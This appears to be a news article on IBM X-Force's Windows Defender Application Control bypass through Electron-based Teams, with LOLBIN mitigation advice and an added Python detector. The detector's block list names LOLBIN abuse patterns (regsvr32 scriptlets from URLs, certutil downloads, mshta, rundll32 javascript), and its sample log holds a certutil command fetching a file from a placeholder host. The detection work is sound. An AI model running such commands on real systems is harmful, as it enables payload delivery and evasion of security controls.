Hackers Bypass Windows Defender Security — What You Need To Know

Recently, elite red team hackers from IBM X-Force have confirmed that they can bypass the security controls of Windows Defender Application Control (WDAC), a software-based security layer designed to protect devices against malware and untrusted software. This is a significant development in the world of cybersecurity, with far-reaching implications for users.

In order to understand the severity of this issue, it's essential to briefly explain what WDAC does. In its own words, Microsoft describes it as "a security boundary that prevents malicious code from running by ensuring that only approved code can be run." This means that only trusted software is allowed to execute on a device, and any attempts to bypass this control are considered a major security risk.

The good news is that the researchers behind the bypass have been transparent about their findings. Bobby Cooke, an IBM X-Force red team operator, confirmed that Microsoft Teams was "a viable WDAC bypass" target. By exploiting a vulnerability in Electron applications, Cooke and his team successfully bypassed the security controls and executed their payload.

So, how did they do it? The researchers targeted the legacy Microsoft Teams application, which is built on Electron and signed by Microsoft. This made it an attractive target for the red team, as it was capable of bypassing even the strictest WDAC policies. However, there's a catch: Node.js, the JavaScript runtime used in Electron applications, lacks the full functionality of C, where developers can directly call WINAPIs and NTAPIs.

But that gap is bridged by Node modules, which can extend the capabilities of the Node.js framework and execute JavaScript within Electron applications. This allowed Cooke's team to use the signed Teams application as the vehicle for their payload and bypass WDAC controls.

The LOLBIN (Living Off the Land Binaries) attack is a type of attack that uses perfectly legitimate tools built into the operating system, which can be exploited without setting off security alarms. The attackers manipulate these tools to achieve their goals, often with devastating results: payload obfuscation, code compiling and execution, DLL hijacking, and security protection evasion are all possible outcomes.

So, what can you do to protect yourself? CrowdStrike expert Naeem Rizwan Mirza advises a multi-layered approach, combining proactive measures, detection capabilities, and incident response strategies. Endpoint detection and response (EDR) can provide visibility into command line execution and network connections, allowing for the detection of unusual uses of LOLBINs.

Mirza also emphasizes the importance of good security hygiene, including patch management to fix vulnerabilities in a timely manner, threat intelligence to understand what you're defending against, and an incident response plan to outline steps for detection, containment, eradication, and recovery.

The full report on this attack is highly technical and recommended for security defenders. However, the TL;DR is that mitigation number one requires implementing the recommended block list rules or using another solution to detect common LOLBINs, and mitigation number two is only effective if WDAC is enabled without enforcing DLL signing.
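The article's advice (EDR visibility into command line execution to catch unusual LOLBIN use, or "another solution to detect common LOLBINs") can be illustrated with a small detector. The script below is an added example, not tooling from the IBM X-Force report, CrowdStrike or Microsoft. It scans process-creation events for two signals: a known LOLBIN launched by a user-facing application that rarely spawns one (an Office app, or an Electron-based client such as Teams, which the article names as the bypass vector), and command-line patterns long associated with LOLBIN abuse. The pipe-separated log format, the sample events, the LOLBIN list and the "unusual parent" list are all constructed assumptions; a real deployment would draw them from the EDR's own telemetry and the vendor's block list.

```python
"""
Toy EDR-style detector for unusual LOLBIN use over process-creation events.
Added example: not code from IBM X-Force, CrowdStrike or Microsoft.
"""
from dataclasses import dataclass
import re

# Commonly abused signed Windows binaries (illustrative subset, an assumption).
LOLBINS = {
    "rundll32.exe", "regsvr32.exe", "mshta.exe", "certutil.exe",
    "msbuild.exe", "installutil.exe", "wscript.exe", "cscript.exe",
}

# Parents from which a LOLBIN launch is rarely legitimate: user-facing apps such
# as Office and Electron-based chat clients (constructed list, an assumption).
UNUSUAL_PARENTS = {"teams.exe", "winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe"}

# Command-line patterns widely documented as LOLBIN abuse indicators.
SUSPICIOUS_ARGS = [
    (r"regsvr32\.exe.*\s/i:https?://", "regsvr32 scriptlet from URL"),
    (r"certutil\.exe.*-urlcache", "certutil download"),
    (r"rundll32\.exe.*javascript:", "rundll32 javascript handler"),
    (r"mshta\.exe.*https?://", "mshta remote HTA"),
]

# Constructed sample telemetry. Paths and file names are placeholders.
SAMPLE_LOG = """\
ParentImage=C:\\Windows\\explorer.exe|Image=C:\\Windows\\System32\\rundll32.exe|CommandLine=rundll32.exe shell32.dll,Control_RunDLL
ParentImage=C:\\Users\\alice\\AppData\\Local\\Microsoft\\Teams\\current\\Teams.exe|Image=C:\\Windows\\System32\\rundll32.exe|CommandLine=rundll32.exe C:\\Users\\alice\\AppData\\Local\\Temp\\placeholder.dll,Start
ParentImage=C:\\Windows\\System32\\cmd.exe|Image=C:\\Windows\\System32\\certutil.exe|CommandLine=certutil.exe -urlcache -split -f http://example.invalid/a.bin a.bin
ParentImage=C:\\Windows\\System32\\services.exe|Image=C:\\Windows\\System32\\svchost.exe|CommandLine=svchost.exe -k netsvcs
"""


@dataclass
class ProcessEvent:
    parent_image: str
    image: str
    command_line: str


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def analyze(event: ProcessEvent) -> list[str]:
    """Return a list of human-readable findings for one event (empty = benign)."""
    findings = []
    img = basename(event.image)
    parent = basename(event.parent_image)
    if img in LOLBINS and parent in UNUSUAL_PARENTS:
        findings.append(f"LOLBIN {img} spawned by user app {parent}")
    for pattern, label in SUSPICIOUS_ARGS:
        if re.search(pattern, event.command_line, re.IGNORECASE):
            findings.append(label)
    return findings


def parse_log_line(line: str) -> ProcessEvent:
    """Parse one 'Key=Value|Key=Value' record of the constructed log format."""
    fields = dict(part.split("=", 1) for part in line.split("|"))
    return ProcessEvent(fields["ParentImage"], fields["Image"], fields["CommandLine"])


def scan_log(text: str) -> list[tuple[int, list[str]]]:
    """Return (line number, findings) for every event that raised a finding."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        if not line.strip():
            continue
        findings = analyze(parse_log_line(line))
        if findings:
            hits.append((lineno, findings))
    return hits


if __name__ == "__main__":
    for lineno, findings in scan_log(SAMPLE_LOG):
        print(f"line {lineno}: " + "; ".join(findings))
```

Run on the sample, the explorer-launched rundll32 (a routine Control Panel invocation) and the svchost event produce nothing, while rundll32 spawned by Teams and certutil fetching a file over HTTP are flagged. The parent-process check is deliberately coarse: it is the "unusual use" signal the article describes, and it is meant to be tuned against a baseline of what each application normally spawns rather than shipped as-is.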

Microsoft has acknowledged this report and stated that they will take action as needed to help keep customers protected. However, the impact of this vulnerability on users will depend on their individual circumstances, and it's essential to stay vigilant and take proactive steps to protect yourself against future attacks.